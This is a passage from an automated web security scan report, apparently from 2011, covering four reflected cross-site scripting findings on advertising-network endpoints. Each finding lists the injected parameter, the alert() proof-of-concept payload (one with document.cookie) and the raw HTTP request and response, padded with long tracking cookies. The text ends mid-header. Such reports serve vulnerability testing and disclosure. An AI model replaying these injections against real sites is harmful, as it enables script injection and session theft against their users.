User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c8'%3balert(1)//f56d3235b6d was submitted in the admeld_adprovider_id parameter. This input was echoed as d86c8';alert(1)//f56d3235b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73d86c8'%3balert(1)//f56d3235b6d&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:16 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73d86c8';alert(1)//f56d3235b6d&external_user_id=3460050161923843111"/>');

4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bff1e'%3balert(1)//7b738c3dd7a was submitted in the admeld_callback parameter. This input was echoed as bff1e';alert(1)//7b738c3dd7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbff1e'%3balert(1)//7b738c3dd7a HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbff1e';alert(1)//7b738c3dd7a?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

4.51. http://adnxs.revsci.net/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69369'-alert(1)-'a8318c35dc5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x9069369'-alert(1)-'a8318c35dc5&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response

4.52. http://adnxs.revsci.net/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7888'-alert(1)-'4414a9728dd was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x90&s=748066a7888'-alert(1)-'4414a9728dd&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; 